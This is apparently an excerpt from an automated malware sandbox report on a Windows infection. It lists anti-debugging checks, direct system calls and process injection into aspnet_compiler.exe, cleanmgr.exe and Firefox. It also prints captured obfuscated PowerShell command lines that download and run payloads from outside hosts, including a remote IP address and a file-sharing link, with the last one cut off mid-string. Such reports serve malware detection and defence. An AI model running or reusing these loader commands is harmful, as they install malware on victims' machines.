                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110E420 mov eax, dword ptr fs:[00000030h]13_2_0110E420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110E420 mov eax, dword ptr fs:[00000030h]13_2_0110E420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110C427 mov eax, dword ptr fs:[00000030h]13_2_0110C427
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01196420 mov eax, dword ptr fs:[00000030h]13_2_01196420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01196420 mov eax, dword ptr fs:[00000030h]13_2_01196420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01196420 mov eax, dword ptr fs:[00000030h]13_2_01196420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01196420 mov eax, dword ptr fs:[00000030h]13_2_01196420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01196420 mov eax, dword ptr fs:[00000030h]13_2_01196420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01196420 mov eax, dword ptr fs:[00000030h]13_2_01196420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01196420 mov eax, dword ptr fs:[00000030h]13_2_01196420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113245A mov eax, dword ptr fs:[00000030h]13_2_0113245A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110645D mov eax, dword ptr fs:[00000030h]13_2_0110645D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011CF453 mov eax, dword ptr fs:[00000030h]13_2_011CF453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111B440 mov eax, dword ptr fs:[00000030h]13_2_0111B440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111B440 mov eax, dword ptr fs:[00000030h]13_2_0111B440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111B440 mov eax, dword ptr fs:[00000030h]13_2_0111B440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111B440 mov eax, dword ptr fs:[00000030h]13_2_0111B440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111B440 mov eax, dword ptr fs:[00000030h]13_2_0111B440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111B440 mov eax, dword ptr fs:[00000030h]13_2_0111B440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114E443 mov eax, dword ptr fs:[00000030h]13_2_0114E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114E443 mov eax, dword ptr fs:[00000030h]13_2_0114E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114E443 mov eax, dword ptr fs:[00000030h]13_2_0114E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114E443 mov eax, dword ptr fs:[00000030h]13_2_0114E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114E443 mov eax, dword ptr fs:[00000030h]13_2_0114E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114E443 mov eax, dword ptr fs:[00000030h]13_2_0114E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114E443 mov eax, dword ptr fs:[00000030h]13_2_0114E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114E443 mov eax, dword ptr fs:[00000030h]13_2_0114E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011E547F mov eax, dword ptr fs:[00000030h]13_2_011E547F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113A470 mov eax, dword ptr fs:[00000030h]13_2_0113A470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113A470 mov eax, dword ptr fs:[00000030h]13_2_0113A470
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: amsi32_7648.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi32_7184.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi32_7184.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7184, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtProtectVirtualMemory: Direct from: 0x77542F9C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtSetInformationProcess: Direct from: 0x77542C5C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtOpenKeyEx: Direct from: 0x77542B9C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtCreateFile: Direct from: 0x77542FEC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtOpenFile: Direct from: 0x77542DCC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtQueryInformationToken: Direct from: 0x77542CAC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtTerminateThread: Direct from: 0x77542FCC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtDeviceIoControlFile: Direct from: 0x77542AEC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtAllocateVirtualMemory: Direct from: 0x77542BEC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtOpenSection: Direct from: 0x77542E0C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtAllocateVirtualMemory: Direct from: 0x775448EC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtSetInformationThread: Direct from: 0x775363F9
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtQuerySystemInformation: Direct from: 0x775448CC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtClose: Direct from: 0x77542B6C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtReadVirtualMemory: Direct from: 0x77542E8C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtCreateKey: Direct from: 0x77542C6C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtSetInformationThread: Direct from: 0x77542B4C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtQueryAttributesFile: Direct from: 0x77542E6C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtAllocateVirtualMemory: Direct from: 0x77543C9C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtCreateUserProcess: Direct from: 0x7754371C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtQueryInformationProcess: Direct from: 0x77542C26
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtResumeThread: Direct from: 0x77542FBC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtWriteVirtualMemory: Direct from: 0x7754490C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtDelayExecution: Direct from: 0x77542DDC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtAllocateVirtualMemory: Direct from: 0x77542BFC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtReadFile: Direct from: 0x77542ADC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtQuerySystemInformation: Direct from: 0x77542DFC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtResumeThread: Direct from: 0x775436AC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtNotifyChangeKey: Direct from: 0x77543C2C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtCreateMutant: Direct from: 0x775435CC
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtWriteVirtualMemory: Direct from: 0x77542E3C
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeNtMapViewOfSection: Direct from: 0x77542D1C
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\SysWOW64\cleanmgr.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: NULL target: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe protection: read write
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: NULL target: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\cleanmgr.exeThread register set: target process: 688
                    Source: C:\Windows\SysWOW64\cleanmgr.exeThread APC queued: target process: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 8A4008Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0ZXJzbW9vdGhzbW9vdGh5a2luZ3N0b2dldG1lc3dlZWV0bmVzcy50SUYiLCIkRW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMiLDAsMCk7c3RBclQtU0xFRXAoMyk7aWV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlYWJldHRlcmJ1dHRlcnNtb290aHNtb290aHlraW5nc3RvZ2V0bWVzdy52QnMi'+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXeJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createabetterbuttersmoothsmoothykingstogetmesw.vBs" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA57E.tmp" "c:\Users\user\AppData\Local\Temp\uzumsuzj\CSC9B0A3672FBDD48D4844B884E3D96D699.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F